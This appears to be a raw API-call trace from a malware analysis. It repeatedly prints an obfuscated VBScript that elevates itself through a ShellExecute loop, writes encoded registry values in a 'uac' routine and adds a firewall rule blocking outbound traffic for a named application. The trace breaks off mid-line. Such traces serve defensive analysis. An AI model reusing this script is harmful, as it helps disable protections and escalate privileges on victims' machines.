false Then\r\nSet okokCHAVE7 = CreateObject(bmw(\"EDWESEPEWEWCKDEFBFBEWETENELFFETFAEY\"))\r\nokokCHAVE7.ShellExecute bmw(\"TFXFTFDFSFJFQFUDAFFFYFF\"), Chr(34) & _\r\nWScript.ScriptFullName & Chr(34) & \" \"& bmw(\"BFDEIEK\"), \"\", bmw(\"RFQFTFMEYFR\"), 1\r\nWScript.Sleep(600000)\r\nElse\r\nindex = 1001\r\nEnd If\r\nLoop Until index > 1000\r\nelse\r\nuac\r\nindex = 1001\r\nEnd If\r\nEnd If\r\n", _String2="\r\n'' SIG '' Begin signature block", _MaxCount=0x21) returned 75 [0226.348] wcsncmp (_String1="\nrule.enabled = false\r\nrules.Remove rule.name\r\nEnd If\r\nNext\r\n\r\nDim newRule\r\nSet newRule = CreateObject(bmw(\"CDJDPENFDDEEOEPCIDHDYDTFEEUEN\"))\r\nnewRule.Name = str1\r\nnewRule.Description = bmw(\"BFAEMEOFAEIBSEXEIFAEIBSCV\") & str1 & \">\"\r\nnewRule.Applicationname = str2\r\nnewRule.Protocol = PROTOCOL_TCP\r\nnewRule.LocalPorts = ALL\r\nnewRule.RemotePorts = ALL\r\nnewRule.Enabled = TRUE\r\nnewRule.Grouping = bmw(\"QDPFDFGFPFCFUEXFJFJEXFNFGCWFBFJFJCUCVDBDCDBDEDE\")\r\nnewRule.Profiles = 2147483647\r\nnewRule.Action = ACTION_BLOCK\r\nnewRule.Direction = NET_FW_RULE_DIR_OUT\r\n\r\nrules.Add newRule\r\nEnd Function\r\n\r\nFunction uac\r\nDim okokCHAVE7\r\nSet okokCHAVE7 = WScript.CreateObject(bmw(\"VESEOFFFUFLFSFWDCEOFKFHFOFO\"))\r\n\r\nokokCHAVE7.RegWrite bmw(\"QDXEBDUEPEVECEFDSDQECEVEDDQDSDXDYEEDUESEJEFDVEKENDQEIDUESEDFGFAFPFMFQFMFDFRESENFGFLFBFMFUFQESDSFSFPFPFCFLFREMFCFPFQFGFMFLESEGFMFJFGFAFGFCFQESEJFWFQFRFCFKESDUFLEXEYFJFCECELDQ\"), 0, bmw(\"JEBDNDPEODMEGDXEBDM\")\r\nokokCHAVE7.RegWrite bmw(\"DDKDNDHECEIDODRDFDDDOEIDPDDDFDKDLDQDHEFDVDRDIDWEADDDUDHEFDPESEMFCEYFDEYEPFEEFEAESEXENEYFHFDEFDFFFFCFCEOEXFEDYEOFCFDESEYEXEFDSEYEVESEMESEOFDEFDVFJFDFEEOEWEFDFEYEXFDEOEXFEDSFCEYEWFAFEDEEOEREKFGESEYFCDDENEWESEX\"), 0, bmw(\"DDUDHDJEIDGEADRDUDG\")\r\nokokCHAVE7.RegWrite bmw(\"EDLDODIEDEJDPDSDGDEDPEJDQDEDGDLDMDRDIEGDWDSDJDXEBDEDVDIEGDQETENFDFAFEFAEQFFEGEBETEYEOFAFIFEEGDGFGFDFDEPEYFFEAEPFDFEETFAEYEGDTFAEWETENETEPFEEGDWFKFEFFEPEXEGDTFDFAEXFBFFDSEYDWEPENFGFDEPDHEPFEEVFFFAFB\"), 0, bmw(\"IEADMDOENDLEFDWEADL\")\r\nokokCHAVE7.RegWrite bmw(\"CDJDMDGEBEHDEDWDTDTDGDPDVEHDWDUDGDTEEDUEXEOFDFGEJFBENEEDOERELFBEXFCEXEOFDEEDKEWFDENFBEWENFDBTDGFHEYEUEXFBENFBEEDFEXFGEWEUEXEJEMEEDEEQENELETDGFHENDUEREPEWEJFDFEFBENFC\"), bmw(\"AEUEV\")\r\nokokCHAVE7.RegWrite bmw(\"QDXEBDUEPEVDSELEIEIDUEEEKEVELEJDUEIESEJFMFDFRFUEXFPFCESEDFGFAFPFMFQFMFDFRESDYFLFRFCFPFLFCFRCIDUFVFNFJFMFPFCFPESDTFMFUFLFJFMEXFBESEIFSFLDYFLFTEXFJFGFBEJFGFEFLEXFRFSFPFCFQ\"), bmw(\"JCRCRCRCRCRCRCRCS\")\r\n\r\nokokCHAVE7.RegWrite bmw(\"CDJDMDNDOEEDUEXEOFDFGEJFBENEEDOERELFBEXFCEXEOFDEEDUENELFEFBERFDFIBTDEENEWFDENFBEEDCEWFDERDXERFBFEFCDFERFCEJEKEUENDPEXFDEREOFI\"), 00000001, bmw(\"LEDDPDREQDOEIEAEDDO\")\r\nokokCHAVE7.RegWrite bmw(\"DDKDNDODPEFDVEYEPFEFHEKFCEOEFDPESEMFCEYFDEYEPFEEFDVEOEMFFFCESFEFJBUDFEOEXFEEOFCEFDXFAENEKFEEOFDDGESFDEKELEVEODQEYFEESEPFJ\"), 00000001, bmw(\"REJDVDXEWDUEOEGEJDU\")\r\nokokCHAVE7.run bmw(\"SFSFCCKFCFOFNFFFIFGCKEPFIFNDVFEFFFEFNFDCKFSFTFAFRFTDOCKFDFIFSFAFBFLFEFD\"),0\r\nokokCHAVE7.run bmw(\"LFGEWFMCDFEFHEUESFEEYFKFHFNFICDDSFHFFEWEGFLEWFKFLCDCSEVEWFEEWFMEWCDDOEEFLDOEBDXFQCTCXCV\"),0\r\n\r\ncriarregra bmw(\"DDGDVFDDGDSDPFICLCPCNCL\"), bmw(\"XEADQFAENFWFTFLFWFFFRCPEDFNFQFJFXFADXETDXEQERCPEQFTFKFYGCFFFWFJFADXGBFFFXFYFAEQFJFYGAFUFAFFGBFFFXFYDEFXFJFYGAFU\")\r\n\r\n\r\nokokCHAVE7.run bmw(\"EENEXEOBVCLEVBVEPENESFABVELBVDBBVBXDGCWEGDYFEEPFDFEEGDTFGEMEWETENEGDRCPDIEREGFGENBX\"),0\r\nokokCHAVE7.run bmw(\"KETFEEUCCCRFCCCFKEYFMFLEUFGFOFFCCCPFJCCCPFLCCCSCCCPEW\"),0\r\n\r\n\r\nEnd Function\r\n\r\n\r\nSet fso = CreateObject(bmw(\"FDXEOFEEUFCFGEUFAESCLDKEUEXEQDXFLFFFGEQEYDTENEVEQEOFG\"))\r\nIf (fso.FileExists(bmw(\"WDYDPEYERFWFIFVFWEYEMFYFFFPFMFGEYEKDIEBFKEYFYFG\"))) = false Then\r\nIf WScript.Arguments.length = 0 Then\r\nDo\r\nIf (fso.FileExists(bmw(\"ODQDHEQEJFOFAFNFOEQEEFQEWFHFEEXEQECDADSFCEQFQEX\"))) = false Then\r\nSet okokCHAVE7 = CreateObject(bmw(\"EDWESEPEWEWCKDEFBFBEWETENELFFETFAEY\"))\r\nokokCHAVE7.ShellExecute bmw(\"TFXFTFDFSFJFQFUDAFFFYFF\"), Chr(34) & _\r\nWScript.ScriptFullName & Chr(34) & \" \"& bmw(\"BFDEIEK\"), \"\", bmw(\"RFQFTFMEYFR\"), 1\r\nWScript.Sleep(600000)\r\nElse\r\nindex = 1001\r\nEnd If\r\nLoop Until index > 1000\r\nelse\r\nuac\r\nindex = 1001\r\nEnd If\r\nEnd If\r\n", _String2="\r\n'' SIG '' Begin signature block", _MaxCount=0x21) returned -3 [0226.348] wcsncmp (_String1="rule.enabled = false\r\nrules.Remove rule.name\r\nEnd If\r\nNext\r\n\r\nDim newRule\r\nSet newRule = CreateObject(bmw(\"CDJDPENFDDEEOEPCIDHDYDTFEEUEN\"))\r\nnewRule.Name = str1\r\nnewRule.Description = bmw(\"BFAEMEOFAEIBSEXEIFAEIBSCV\") & str1 & \">\"\r\nnewRule.Applicationname = str2\r\nnewRule.Protocol = PROTOCOL_TCP\r\nnewRule.LocalPorts = ALL\r\nnewRule.RemotePorts = ALL\r\nnewRule.Enabled = TRUE\r\nnewRule.Grouping = bmw(\"QDPFDFGFPFCFUEXFJFJEXFNFGCWFBFJFJCUCVDBDCDBDEDE\")\r\nnewRule.Profiles = 2147483647\r\nnewRule.Action = ACTION_BLOCK\r\nnewRule.Direction = NET_FW_RULE_DIR_OUT\r\n\r\nrules.Add newRule\r\nEnd Function\r\n\r\nFunction uac\r\nDim okokCHAVE7\r\nSet okokCHAVE7 = WScript.CreateObject(bmw(\"VESEOFFFUFLFSFWDCEOFKFHFOFO\"))\r\n\r\nokokCHAVE7.RegWrite bmw(\"QDXEBDUEPEVECEFDSDQECEVEDDQDSDXDYEEDUESEJEFDVEKENDQEIDUESEDFGFAFPFMFQFMFDFRESENFGFLFBFMFUFQESDSFSFPFPFCFLFREMFCFPFQFGFMFLESEGFMFJFGFAFGFCFQESEJFWFQFRFCFKESDUFLEXEYFJFCECELDQ\"), 0, bmw(\"JEBDNDPEODMEGDXEBDM\")\r\nokokCHAVE7.RegWrite bmw(\"DDKDNDHECEIDODRDFDDDOEIDPDDDFDKDLDQDHEFDVDRDIDWEADDDUDHEFDPESEMFCEYFDEYEPFEEFEAESEXENEYFHFDEFDFFFFCFCEOEXFEDYEOFCFDESEYEXEFDSEYEVESEMESEOFDEFDVFJFDFEEOEWEFDFEYEXFDEOEXFEDSFCEYEWFAFEDEEOEREKFGESEYFCDDENEWESEX\"), 0, bmw(\"DDUDHDJEIDGEADRDUDG\")\r\nokokCHAVE7.RegWrite bmw(\"EDLDODIEDEJDPDSDGDEDPEJDQDEDGDLDMDRDIEGDWDSDJDXEBDEDVDIEGDQETENFDFAFEFAEQFFEGEBETEYEOFAFIFEEGDGFGFDFDEPEYFFEAEPFDFEETFAEYEGDTFAEWETENETEPFEEGDWFKFEFFEPEXEGDTFDFAEXFBFFDSEYDWEPENFGFDEPDHEPFEEVFFFAFB\"), 0, bmw(\"IEADMDOENDLEFDWEADL\")\r\nokokCHAVE7.RegWrite bmw(\"CDJDMDGEBEHDEDWDTDTDGDPDVEHDWDUDGDTEEDUEXEOFDFGEJFBENEEDOERELFBEXFCEXEOFDEEDKEWFDENFBEWENFDBTDGFHEYEUEXFBENFBEEDFEXFGEWEUEXEJEMEEDEEQENELETDGFHENDUEREPEWEJFDFEFBENFC\"), bmw(\"AEUEV\")\r\nokokCHAVE7.RegWrite bmw(\"QDXEBDUEPEVDSELEIEIDUEEEKEVELEJDUEIESEJFMFDFRFUEXFPFCESEDFGFAFPFMFQFMFDFRESDYFLFRFCFPFLFCFRCIDUFVFNFJFMFPFCFPESDTFMFUFLFJFMEXFBESEIFSFLDYFLFTEXFJFGFBEJFGFEFLEXFRFSFPFCFQ\"), bmw(\"JCRCRCRCRCRCRCRCS\")\r\n\r\nokokCHAVE7.RegWrite bmw(\"CDJDMDNDOEEDUEXEOFDFGEJFBENEEDOERELFBEXFCEXEOFDEEDUENELFEFBERFDFIBTDEENEWFDENFBEEDCEWFDERDXERFBFEFCDFERFCEJEKEUENDPEXFDEREOFI\"), 00000001, bmw(\"LEDDPDREQDOEIEAEDDO\")\r\nokokCHAVE7.RegWrite bmw(\"DDKDNDODPEFDVEYEPFEFHEKFCEOEFDPESEMFCEYFDEYEPFEEFDVEOEMFFFCESFEFJBUDFEOEXFEEOFCEFDXFAENEKFEEOFDDGESFDEKELEVEODQEYFEESEPFJ\"), 00000001, bmw(\"REJDVDXEWDUEOEGEJDU\")\r\nokokCHAVE7.run bmw(\"SFSFCCKFCFOFNFFFIFGCKEPFIFNDVFEFFFEFNFDCKFSFTFAFRFTDOCKFDFIFSFAFBFLFEFD\"),0\r\nokokCHAVE7.run bmw(\"LFGEWFMCDFEFHEUESFEEYFKFHFNFICDDSFHFFEWEGFLEWFKFLCDCSEVEWFEEWFMEWCDDOEEFLDOEBDXFQCTCXCV\"),0\r\n\r\ncriarregra bmw(\"DDGDVFDDGDSDPFICLCPCNCL\"), bmw(\"XEADQFAENFWFTFLFWFFFRCPEDFNFQFJFXFADXETDXEQERCPEQFTFKFYGCFFFWFJFADXGBFFFXFYFAEQFJFYGAFUFAFFGBFFFXFYDEFXFJFYGAFU\")\r\n\r\n\r\nokokCHAVE7.run bmw(\"EENEXEOBVCLEVBVEPENESFABVELBVDBBVBXDGCWEGDYFEEPFDFEEGDTFGEMEWETENEGDRCPDIEREGFGENBX\"),0\r\nokokCHAVE7.run bmw(\"KETFEEUCCCRFCCCFKEYFMFLEUFGFOFFCCCPFJCCCPFLCCCSCCCPEW\"),0\r\n\r\n\r\nEnd Function\r\n\r\n\r\nSet fso = CreateObject(bmw(\"FDXEOFEEUFCFGEUFAESCLDKEUEXEQDXFLFFFGEQEYDTENEVEQEOFG\"))\r\nIf (fso.FileExists(bmw(\"WDYDPEYERFWFIFVFWEYEMFYFFFPFMFGEYEKDIEBFKEYFYFG\"))) = false Then\r\nIf WScript.Arguments.length = 0 Then\r\nDo\r\nIf (fso.FileExists(bmw(\"ODQDHEQEJFOFAFNFOEQEEFQEWFHFEEXEQECDADSFCEQFQEX\"))) = false Then\r\nSet okokCHAVE7 = CreateObject(bmw(\"EDWESEPEWEWCKDEFBFBEWETENELFFETFAEY\"))\r\nokokCHAVE7.ShellExecute bmw(\"TFXFTFDFSFJFQFUDAFFFYFF\"), Chr(34) & _\r\nWScript.ScriptFullName & Chr(34) & \" \"& bmw(\"BFDEIEK\"), \"\", bmw(\"RFQFTFMEYFR\"), 1\r\nWScript.Sleep(600000)\r\nElse\r\nindex = 1001\r\nEnd If\r\nLoop Until index > 1000\r\nelse\r\nuac\r\nindex = 1001\r\nEnd If\r\nEnd If\r\n", _String2="\r\n'' SIG '' Begin signature block", _MaxCount=0x21) returned 101 [0226.348] wcsncmp (_String1="ule.enabled = false\r\nrules.Remove rule.name\r\nEnd If\r\nNext\r\n\r\nDim newRule\r\nSet newRule = CreateObject(bmw(\"CDJDPENFDDEEOEPCIDHDYDTFEEUEN\"))\r\nnewRule.Name = str1\r\nnewRule.Description = bmw(\"BFAEMEOFAEIBSEXEIFAEIBSCV\") & str1 & \">\"\r\nnewRule.Applicationname = str2\r\nnewRule.Protocol = PROTOCOL_TCP\r\nnewRule.LocalPorts = ALL\r\nnewRule.RemotePorts = ALL\r\nnewRule.Enabled = TRUE\r\nnewRule.Grouping = bmw(\"QDPFDFGFPFCFUEXFJFJEXFNFGCWFBFJFJCUCVDBDCDBDEDE\")\r\nnewRule.Profiles = 2147483647\r\nnewRule.Action = ACTION_BLOCK\r\nnewRule.Direction = NET_FW_RULE_DIR_OUT\r\n\r\nrules.Add newRule\r\nEnd Function\r\n\r\nFunction uac\r\nDim okokCHAVE7\r\nSet okokCHAVE7 = WScript.CreateObject(bmw(\"VESEOFFFUFLFSFWDCEOFKFHFOFO\"))\r\n\r\nokokCHAVE7.RegWrite bmw(\"QDXEBDUEPEVECEFDSDQECEVEDDQDSDXDYEEDUESEJEFDVEKENDQEIDUESEDFGFAFPFMFQFMFDFRESENFGFLFBFMFUFQESDSFSFPFPFCFLFREMFCFPFQFGFMFLESEGFMFJFGFAFGFCFQESEJFWFQFRFCFKESDUFLEXEYFJFCECELDQ\"), 0, bmw(\"JEBDNDPEODMEGDXEBDM\")\r\nokokCHAVE7.RegWrite bmw(\"DDKDNDHECEIDODRDFDDDOEIDPDDDFDKDLDQDHEFDVDRDIDWEADDDUDHEFDPESEMFCEYFDEYEPFEEFEAESEXENEYFHFDEFDFFFFCFCEOEXFEDYEOFCFDESEYEXEFDSEYEVESEMESEOFDEFDVFJFDFEEOEWEFDFEYEXFDEOEXFEDSFCEYEWFAFEDEEOEREKFGESEYFCDDENEWESEX\"), 0, bmw(\"DDUDHDJEIDGEADRDUDG\")\r\nokokCHAVE7.RegWrite bmw(\"EDLDODIEDEJDPDSDGDEDPEJDQDEDGDLDMDRDIEGDWDSDJDXEBDEDVDIEGDQETENFDFAFEFAEQFFEGEBETEYEOFAFIFEEGDGFGFDFDEPEYFFEAEPFDFEETFAEYEGDTFAEWETENETEPFEEGDWFKFEFFEPEXEGDTFDFAEXFBFFDSEYDWEPENFGFDEPDHEPFEEVFFFAFB\"), 0, bmw(\"IEADMDOENDLEFDWEADL\")\r\nokokCHAVE7.RegWrite bmw(\"CDJDMDGEBEHDEDWDTDTDGDPDVEHDWDUDGDTEEDUEXEOFDFGEJFBENEEDOERELFBEXFCEXEOFDEEDKEWFDENFBEWENFDBTDGFHEYEUEXFBENFBEEDFEXFGEWEUEXEJEMEEDEEQENELETDGFHENDUEREPEWEJFDFEFBENFC\"), bmw(\"AEUEV\")\r\nokokCHAVE7.RegWrite bmw(\"QDXEBDUEPEVDSELEIEIDUEEEKEVELEJDUEIESEJFMFDFRFUEXFPFCESEDFGFAFPFMFQFMFDFRESDYFLFRFCFPFLFCFRCIDUFVFNFJFMFPFCFPESDTFMFUFLFJFMEXFBESEIFSFLDYFLFTEXFJFGFBEJFGFEFLEXFRFSFPFCFQ\"), bmw(\"JCRCRCRCRCRCRCRCS\")\r\n\r\nokokCHAVE7.RegWrite bmw(\"CDJDMDNDOEEDUEXEOFDFGEJFBENEEDOERELFBEXFCEXEOFDEEDUENELFEFBERFDFIBTDEENEWFDENFBEEDCEWFDERDXERFBFEFCDFERFCEJEKEUENDPEXFDEREOFI\"), 00000001, bmw(\"LEDDPDREQDOEIEAEDDO\")\r\nokokCHAVE7.RegWrite bmw(\"DDKDNDODPEFDVEYEPFEFHEKFCEOEFDPESEMFCEYFDEYEPFEEFDVEOEMFFFCESFEFJBUDFEOEXFEEOFCEFDXFAENEKFEEOFDDGESFDEKELEVEODQEYFEESEPFJ\"), 00000001, bmw(\"REJDVDXEWDUEOEGEJDU\")\r\nokokCHAVE7.run bmw(\"SFSFCCKFCFOFNFFFIFGCKEPFIFNDVFEFFFEFNFDCKFSFTFAFRFTDOCKFDFIFSFAFBFLFEFD\"),0\r\nokokCHAVE7.run bmw(\"LFGEWFMCDFEFHEUESFEEYFKFHFNFICDDSFHFFEWEGFLEWFKFLCDCSEVEWFEEWFMEWCDDOEEFLDOEBDXFQCTCXCV\"),0\r\n\r\ncriarregra bmw(\"DDGDVFDDGDSDPFICLCPCNCL\"), bmw(\"XEADQFAENFWFTFLFWFFFRCPEDFNFQFJFXFADXETDXEQERCPEQFTFKFYGCFFFWFJFADXGBFFFXFYFAEQFJFYGAFUFAFFGBFFFXFYDEFXFJFYGAFU\")\r\n\r\n\r\nokokCHAVE7.run bmw(\"EENEXEOBVCLEVBVEPENESFABVELBVDBBVBXDGCWEGDYFEEPFDFEEGDTFGEMEWETENEGDRCPDIEREGFGENBX\"),0\r\nokokCHAVE7.run bmw(\"KETFEEUCCCRFCCCFKEYFMFLEUFGFOFFCCCPFJCCCPFLCCCSCCCPEW\"),0\r\n\r\n\r\nEnd Function\r\n\r\n\r\nSet fso = CreateObject(bmw(\"FDXEOFEEUFCFGEUFAESCLDKEUEXEQDXFLFFFGEQEYDTENEVEQEOFG\"))\r\nIf (fso.FileExists(bmw(\"WDYDPEYERFWFIFVFWEYEMFYFFFPFMFGEYEKDIEBFKEYFYFG\"))) = false Then\r\nIf WScript.Arguments.length = 0 Then\r\nDo\r\nIf (fso.FileExists(bmw(\"ODQDHEQEJFOFAFNFOEQEEFQEWFHFEEXEQECDADSFCEQFQEX\"))) = false Then\r\nSet okokCHAVE7 = CreateObject(bmw(\"EDWESEPEWEWCKDEFBFBEWETENELFFETFAEY\"))\r\nokokCHAVE7.ShellExecute bmw(\"TFXFTFDFSFJFQFUDAFFFYFF\"), Chr(34) & _\r\nWScript.ScriptFullName & Chr(34) & \" \"& bmw(\"BFDEIEK\"), \"\", bmw(\"RFQFTFMEYFR\"), 1\r\nWScript.Sleep(600000)\r\nElse\r\nindex = 1001\r\nEnd If\r\nLoop Until index > 1000\r\nelse\r\nuac\r\nindex = 1001\r\nEnd If\r\nEnd If\r\n", _String2="\r\n'' SIG '' Begin signature block", _MaxCount=0x21) returned 104 [0226.348] wcsncmp (_String1="le.enabled = false\r\nrules.Remove rule.name\r\nEnd If\r\nNext\r\n\r\nDim newRule\r\nSet newRule = CreateObject(bmw(\"CDJDPENFDDEEOEPCIDHDYDTFEEUEN\"))\r\nnewRule.Name = str1\r\nnewRule.Description = bmw(\"BFAEMEOFAEIBSEXEIFAEIBSCV\") & str1 & \">\"\r\nnewRule.Applicationname = str2\r\nnewRule.Protocol = PROTOCOL_TCP\r\nnewRule.LocalPorts = ALL\r\nnewRule.RemotePorts = ALL\r\nnewRule.Enabled = TRUE\r\nnewRule.Grouping = bmw(\"QDPFDFGFPFCFUEXFJFJEXFNFGCWFBFJFJCUCVDBDCDBDEDE\")\r\nnewRule.Profiles = 2147483647\r\nnewRule.Action = ACTION_BLOCK\r\nnewRule.Direction = NET_FW_RULE_DIR_OUT\r\n\r\nrules.Add newRule\r\nEnd Function\r\n\r\nFunction uac\r\nDim okokCHAVE7\r\nSet okokCHAVE7 = WScript.CreateObject(bmw(\"VESEOFFFUFLFSFWDCEOFKFHFOFO\"))\r\n\r\nokokCHAVE7.RegWrite bmw(\"QDXEBDUEPEVECEFDSDQECEVEDDQDSDXDYEEDUESEJEFDVEKENDQEIDUESEDFGFAFPFMFQFMFDFRESENFGFLFBFMFUFQESDSFSFPFPFCFLFREMFCFPFQFGFMFLESEGFMFJFGFAFGFCFQESEJFWFQFRFCFKESDUFLEXEYFJFCECELDQ\"), 0, bmw(\"JEBDNDPEODMEGDXEBDM\")\r\nokokCHAVE7.RegWrite bmw(\"DDKDNDHECEIDODRDFDDDOEIDPDDDFDKDLDQDHEFDVDRDIDWEADDDUDHEFDPESEMFCEYFDEYEPFEEFEAESEXENEYFHFDEFDFFFFCFCEOEXFEDYEOFCFDESEYEXEFDSEYEVESEMESEOFDEFDVFJFDFEEOEWEFDFEYEXFDEOEXFEDSFCEYEWFAFEDEEOEREKFGESEYFCDDENEWESEX\"), 0, bmw(\"DDUDHDJEIDGEADRDUDG\")\r\nokokCHAVE7.RegWrite bmw(\"EDLDODIEDEJDPDSDGDEDPEJDQDEDGDLDMDRDIEGDWDSDJDXEBDEDVDIEGDQETENFDFAFEFAEQFFEGEBETEYEOFAFIFEEGDGFGFDFDEPEYFFEAEPFDFEETFAEYEGDTFAEWETENETEPFEEGDWFKFEFFEPEXEGDTFDFAEXFBFFDSEYDWEPENFGFDEPDHEPFEEVFFFAFB\"), 0, bmw(\"IEADMDOENDLEFDWEADL\")\r\nokokCHAVE7.RegWrite bmw(\"CDJDMDGEBEHDEDWDTDTDGDPDVEHDWDUDGDTEEDUEXEOFDFGEJFBENEEDOERELFBEXFCEXEOFDEEDKEWFDENFBEWENFDBTDGFHEYEUEXFBENFBEEDFEXFGEWEUEXEJEMEEDEEQENELETDGFHENDUEREPEWEJFDFEFBENFC\"), bmw(\"AEUEV\")\r\nokokCHAVE7.RegWrite bmw(\"QDXEBDUEPEVDSELEIEIDUEEEKEVELEJDUEIESEJFMFDFRFUEXFPFCESEDFGFAFPFMFQFMFDFRESDYFLFRFCFPFLFCFRCIDUFVFNFJFMFPFCFPESDTFMFUFLFJFMEXFBESEIFSFLDYFLFTEXFJFGFBEJFGFEFLEXFRFSFPFCFQ\"), bmw(\"JCRCRCRCRCRCRCRCS\")\r\n\r\nokokCHAVE7.RegWrite bmw(\"CDJDMDNDOEEDUEXEOFDFGEJFBENEEDOERELFBEXFCEXEOFDEEDUENELFEFBERFDFIBTDEENEWFDENFBEEDCEWFDERDXERFBFEFCDFERFCEJEKEUENDPEXFDEREOFI\"), 00000001, bmw(\"LEDDPDREQDOEIEAEDDO\")\r\nokokCHAVE7.RegWrite bmw(\"DDKDNDODPEFDVEYEPFEFHEKFCEOEFDPESEMFCEYFDEYEPFEEFDVEOEMFFFCESFEFJBUDFEOEXFEEOFCEFDXFAENEKFEEOFDDGESFDEKELEVEODQEYFEESEPFJ\"), 00000001, bmw(\"REJDVDXEWDUEOEGEJDU\")\r\nokokCHAVE7.run bmw(\"SFSFCCKFCFOFNFFFIFGCKEPFIFNDVFEFFFEFNFDCKFSFTFAFRFTDOCKFDFIFSFAFBFLFEFD\"),0\r\nokokCHAVE7.run bmw(\"LFGEWFMCDFEFHEUESFEEYFKFHFNFICDDSFHFFEWEGFLEWFKFLCDCSEVEWFEEWFMEWCDDOEEFLDOEBDXFQCTCXCV\"),0\r\n\r\ncriarregra bmw(\"DDGDVFDDGDSDPFICLCPCNCL\"), bmw(\"XEADQFAENFWFTFLFWFFFRCPEDFNFQFJFXFADXETDXEQERCPEQFTFKFYGCFFFWFJFADXGBFFFXFYFAEQFJFYGAFUFAFFGBFFFXFYDEFXFJFYGAFU\")\r\n\r\n\r\nokokCHAVE7.run bmw(\"EENEXEOBVCLEVBVEPENESFABVELBVDBBVBXDGCWEGDYFEEPFDFEEGDTFGEMEWETENEGDRCPDIEREGFGENBX\"),0\r\nokokCHAVE7.run bmw(\"KETFEEUCCCRFCCCFKEYFMFLEUFGFOFFCCCPFJCCCPFLCCCSCCCPEW\"),0\r\n\r\n\r\nEnd Function\r\n\r\n\r\nSet fso = CreateObject(bmw(\"FDXEOFEEUFCFGEUFAESCLDKEUEXEQDXFLFFFGEQEYDTENEVEQEOFG\"))\r\nIf (fso.FileExists(bmw(\"WDYDPEYERFWFIFVFWEYEMFYFFFPFMFGEYEKDIEBFKEYFYFG\"))) = false Then\r\nIf WScript.Arguments.length = 0 Then\r\nDo\r\nIf (fso.FileExists(bmw(\"ODQDHEQEJFOFAFNFOEQEEFQEWFHFEEXEQECDADSFCEQFQEX\"))) = false Then\r\nSet okokCHAVE7 = CreateObject(bmw(\"EDWESEPEWEWCKDEFBFBEWETENELFFETFAEY\"))\r\nokokCHAVE7.ShellExecute bmw(\"TFXFTFDFSFJFQFUDAFFFYFF\"), Chr(34) & _\r\nWScript.ScriptFullName & Chr(34) & \" \"& bmw(\"BFDEIEK\"), \"\", bmw(\"RFQFTFMEYFR\"), 1\r\nWScript.Sleep(600000)\r\nElse\r\nindex = 1001\r\nEnd If\r\nLoop Until index > 1000\r\nelse\r\nuac\r\nindex = 1001\r\nEnd If\r\nEnd If\r\n", _String2="\r\n'' SIG '' Begin signature block", _MaxCount=0x21) returned 95 [0226.348] wcsncmp (_String1="e.enabled = false\r\nrules.Remove rule.name\r\nEnd If\r\nNext\r\n\r\nDim newRule\r\nSet newRule = CreateObject(bmw(\"CDJDPENFDDEEOEPCIDHDYDTFEEUEN\"))\r\nnewRule.Name = str1\r\nnewRule.Description = bmw(\"BFAEMEOFAEIBSEXEIFAEIBSCV\") & str1 & \">\"\r\nnewRule.Applicationname = str2\r\nnewRule.Protocol = PROTOCOL_TCP\r\nnewRule.LocalPorts = ALL\r\nnewRule.RemotePorts = ALL\r\nnewRule.Enabled = TRUE\r\nnewRule.Grouping = bmw(\"QDPFDFGFPFCFUEXFJFJEXFNFGCWFBFJFJCUCVDBDCDBDEDE\")\r\nnewRule.Profiles = 2147483647\r\nnewRule.Action = ACTION_BLOCK\r\nnewRule.Direction = NET_FW_RULE_DIR_OUT\r\n\r\nrules.Add newRule\r\nEnd Function\r\n\r\nFunction uac\r\nDim okokCHAVE7\r\nSet okokCHAVE7 = WScript.CreateObject(bmw(\"VESEOFFFUFLFSFWDCEOFKFHFOFO\"))\r\n\r\nokokCHAVE7.RegWrite bmw(\"QDXEBDUEPEVECEFDSDQECEVEDDQDSDXDYEEDUESEJEFDVEKENDQEIDUESEDFGFAFPFMFQFMFDFRESENFGFLFBFMFUFQESDSFSFPFPFCFLFREMFCFPFQFGFMFLESEGFMFJFGFAFGFCFQESEJFWFQFRFCFKESDUFLEXEYFJFCECELDQ\"), 0, bmw(\"JEBDNDPEODMEGDXEBDM\")\r\nokokCHAVE7.RegWrite bmw(\"DDKDNDHECEIDODRDFDDDOEIDPDDDFDKDLDQDHEFDVDRDIDWEADDDUDHEFDPESEMFCEYFDEYEPFEEFEAESEXENEYFHFDEFDFFFFCFCEOEXFEDYEOFCFDESEYEXEFDSEYEVESEMESEOFDEFDVFJFDFEEOEWEFDFEYEXFDEOEXFEDSFCEYEWFAFEDEEOEREKFGESEYFCDDENEWESEX\"), 0, bmw(\"DDUDHDJEIDGEADRDUDG\")\r\nokokCHAVE7.RegWrite bmw(\"EDLDODIEDEJDPDSDGDEDPEJDQDEDGDLDMDRDIEGDWDSDJDXEBDEDVDIEGDQETENFDFAFEFAEQFFEGEBETEYEOFAFIFEEGDGFGFDFDEPEYFFEAEPFDFEETFAEYEGDTFAEWETENETEPFEEGDWFKFEFFEPEXEGDTFDFAEXFBFFDSEYDWEPENFGFDEPDHEPFEEVFFFAFB\"), 0, bmw(\"IEADMDOENDLEFDWEADL\")\r\nokokCHAVE7.RegWrite bmw(\"CDJDMDGEBEHDEDWDTDTDGDPDVEHDWDUDGDTEEDUEXEOFDFGEJFBENEEDOERELFBEXFCEXEOFDEEDKEWFDENFBEWENFDBTDGFHEYEUEXFBENFBEEDFEXFGEWEUEXEJEMEEDEEQENELETDGFHENDUEREPEWEJFDFEFBENFC\"), bmw(\"AEUEV\")\r\nokokCHAVE7.RegWrite bmw(\"QDXEBDUEPEVDSELEIEIDUEEEKEVELEJDUEIESEJFMFDFRFUEXFPFCESEDFGFAFPFMFQFMFDFRESDYFLFRFCFPFLFCFRCIDUFVFNFJFMFPFCFPESDTFMFUFLFJFMEXFBESEIFSFLDYFLFTEXFJFGFBEJFGFEFLEXFRFSFPFCFQ\"), bmw(\"JCRCRCRCRCRCRCRCS\")\r\n\r\nokokCHAVE7.RegWrite bmw(\"CDJDMDNDOEEDUEXEOFDFGEJFBENEEDOERELFBEXFCEXEOFDEEDUENELFEFBERFDFIBTDEENEWFDENFBEEDCEWFDERDXERFBFEFCDFERFCEJEKEUENDPEXFDEREOFI\"), 00000001, bmw(\"LEDDPDREQDOEIEAEDDO\")\r\nokokCHAVE7.RegWrite bmw(\"DDKDNDODPEFDVEYEPFEFHEKFCEOEFDPESEMFCEYFDEYEPFEEFDVEOEMFFFCESFEFJBUDFEOEXFEEOFCEFDXFAENEKFEEOFDDGESFDEKELEVEODQEYFEESEPFJ\"), 00000001, bmw(\"REJDVDXEWDUEOEGEJDU\")\r\nokokCHAVE7.run 